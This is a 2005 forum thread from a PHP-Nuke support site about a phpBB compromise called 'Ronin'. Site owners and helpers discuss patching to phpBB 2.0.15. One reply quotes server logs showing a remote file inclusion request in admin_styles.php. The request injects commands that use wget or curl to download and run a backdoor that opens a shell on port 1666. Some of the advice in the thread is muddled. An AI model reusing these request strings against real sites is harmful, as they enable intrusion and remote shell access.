Site Hacked - Ronin Exploit ?

Nuke Soldier Joined: Jun 03, 2003 Posts: 25

One of my sites running phpnuke 7.7 has been shut down by our host because it has been compromised...apparently by something called "Ronin" which is in the tmp folder.

I have no doubt this has happened but I find it odd that a search of the Nukecops forums throws up not even a mention of it ?

I don't have access to the tmp folder, it's above the root of my site. So not sure how this can have happened. According to the system admin it's a vulnerability in phpbb. However a search over at phpbb.com doesn't come up with anything either.

Can any of you guys shed some light on this ?

Many thanks

Posted: Mon May 16, 2005 12:27 am

It's a but of PhpBB. In particular the one of admin_styles.php

You must patch your phpBB to remove the bug.

this is the full LOG of a compromision:

Code:

201.9.255.53 - - [08/May/2005:20:28:32 +0200] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://brservers.org.previewyoursite.com/hbr/cmd.gif?&cmd=cd%20/tmp;wget%20http://www.fendora.net/asc/xpl/r0nin;chmod%20777%20r0nin;./r0nin HTTP/1.1" 200 247 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

If you look it would download trought wget a file from fendora and the execute it.

The r0nin is a backdoor that open a Shell on port 1666
Major information can be fount here:
http://www.tecnobyte.org/r0nin.htm
http://www.tecnobyte.org/index.php?id=defacing

A temporaly solution would be to create a file in /tmp wioth the same name that cannot be removed (chattr +i) and remove wget, curl and other tools for download the file.

I saw other kind of attak with the same method, I will put some log below:

Code:

200.216.239.167 - - [09/May/2005:23:30:18 +0200] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://brservers.org.previewyoursite.com/hbr/cmd.gif?&cmd=cd%20/tmp;wget%20www.fendora.net/asc/xpl/r0nin;ls HTTP/1.1" 200 493 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.216.239.167 - - [09/May/2005:23:30:45 +0200] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://brservers.org.previewyoursite.com/hbr/cmd.gif?&cmd=cd%20/tmp;curl%20-o%20r0nin%20www.fendora.net/asc/xpl/r0nin HTTP/1.1" 200 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.216.239.167 - - [10/May/2005:01:30:21 +0200] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://brservers.org.previewyoursite.com/hbr/cmd.gif?&cmd=cd%20/tmp;rm%20-rf%20r0nin;wget%20www.fendora.net/asc/xpl/r0nin;ls HTTP/1.1" 200 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.40.117.15 - - [11/May/2005:01:17:12 +0200] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.fendora.net/asc/xpl/asc.txt?&cmd=id.com/ HTTP/1.1" 200 9745 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3"
200.40.117.15 - - [11/May/2005:01:17:15 +0200] "GET //modules/Forums/templates/subSilver/images/cellpic1.gif HTTP/1.1" 200 246 "http://www.thekey.it//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.fendora.net/asc/xpl/asc.txt?&cmd=id.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3"

Posted: Mon May 16, 2005 3:23 am

In your lunux (or unix) box, when you type in

Code:

ps -aux

you will see ./n
the ./n is came from /tmp directory or /var/tmp directory. That's ronin exploit. That's not actaully hacked via PHP-Nuke. Those hacking comes from phpbb2 or BB2Nuke hole.

First of all,
1) find all html files created sneakly by php hackers
2) kill ./n process which you found by typing ps -aux; i.e., kill process number of ./.
3) reboot your linux (or unix) box
4) update php with the most security version
5) try to use SSL based web-browser

Nuke Soldier Joined: Jun 03, 2003 Posts: 25

Thanks but I don't have root access to the server. It's shared hosting with no SSH enabled. I understand the hole is in phpbb, or in this case BB2nuke as I'm running nuke 7.7. But how do you patch it? Where exactly is the hole and how do I plug it?

Thanks

Posted: Tue May 17, 2005 6:57 am

The whole is php script engine in your sharing server. The server admin is supposed to upgrade php and security patches for php itself. Except that, you don't have to take care of phpnuke 7.7 with BB2Nuke 2.0.15.

Nuke Soldier Joined: Jun 03, 2003 Posts: 25

Xyberian wrote:

The whole is php script engine in your sharing server. The server admin is supposed to upgrade php and security patches for php itself. Except that, you don't have to take care of phpnuke 7.7 with BB2Nuke 2.0.15.

Thanks for that. I was thinking this must be something to do with the server as this has never happened on my other nuke sites which I have on other servers.

I have no doubt they will continue to say it's my site. Yet if phpbb is so insecure why do they offer it with all their packages?

Cheers.

Nuke Soldier Joined: Jun 03, 2003 Posts: 25

Well. The server admin insists you all don't know what your talking about and they have the most up to date version of PHP4 and keep up with all security patches.

Phpnuke 7.7 runs version 2.0.14 of phpbb and I haven't seen an update for it. Although I know there's a 2.0.15 standalone version of phpbb.

Anyone got any further suggestions?

Site Admin Joined: Aug 17, 2003 Posts: 12482

There's already BBToNuke 2.0.15 - http://www.nukeresources.com

Posted: Wed May 18, 2005 5:42 am

You MUST patch to phpBB 2.0.15

Nuke Cadet Joined: May 19, 2005 Posts: 1

Does anybody know the extent of access that a hacked gains with this exploit? I'm running phpnuke on apache. Do they get full access as the apache user?

Posted: Fri May 20, 2005 4:15 am

The r0nin backdoor is running as user apache so it should have the full power of the apache user.

Remember that when r0nin is running it open a shell so if he user can try to elevate his privileges in some manner.

Lieutenant Joined: Aug 12, 2003 Posts: 190

is there a way to limit the apache user so they cannot get a shell? I have the apache user listed as nologin in the /etc/password file but they are still able to open a shell.

Also with the update to 2015 I noticed that there is no files going to the themes/DeepBlue/forums folder, do the files in the themes/DeepBlue/forums folder need to be updated as well?

Thanks
-Lady Cherry

Posted: Sat May 21, 2005 5:57 am

The patch for 2015 is for the core sistem, not for the theme. So no files need to be changed in the themes directory.

Posted: Thu May 26, 2005 3:20 am

aenigma wrote:

You MUST patch to phpBB 2.0.15

must i download this from pbpbb.com or is that only for the standalone forums? can some1 please provide me with a link? thx

Site Admin Joined: Aug 17, 2003 Posts: 12482

Make sure you get BBToNuke 2.0.15 - it is not cumulative.
Do NOT use the phpBB original software to try and patch your system. It will not work.